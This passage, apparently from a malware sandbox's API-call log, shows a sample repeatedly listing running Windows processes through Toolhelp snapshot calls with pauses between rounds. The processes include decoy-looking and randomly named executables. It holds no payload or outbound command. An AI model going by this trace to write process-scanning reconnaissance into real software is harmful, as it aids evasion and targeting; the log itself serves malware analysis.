th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0133.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0133.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0133.437] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0133.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0133.440] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0133.441] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0133.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0133.444] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0133.445] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0133.447] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0133.448] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0133.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0133.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0133.515] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0133.516] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0133.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0133.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0133.519] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0133.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0133.521] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.522] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0133.523] CloseHandle (hObject=0xc4) returned 1 [0133.523] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0133.528] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0133.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0133.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0133.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0133.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0133.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0133.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0133.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0133.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0133.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0133.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0133.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0133.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0133.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0133.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0133.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0133.611] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0133.612] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0133.613] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0133.614] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0133.615] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0133.616] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0133.617] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0133.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0133.619] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0133.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0133.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0133.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0133.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0133.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0133.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0133.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0133.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0133.630] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0133.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0133.632] CloseHandle (hObject=0xbc) returned 1 [0133.632] Sleep (dwMilliseconds=0x12c) [0133.999] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0134.005] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0134.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.009] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.011] Process32NextW (in: 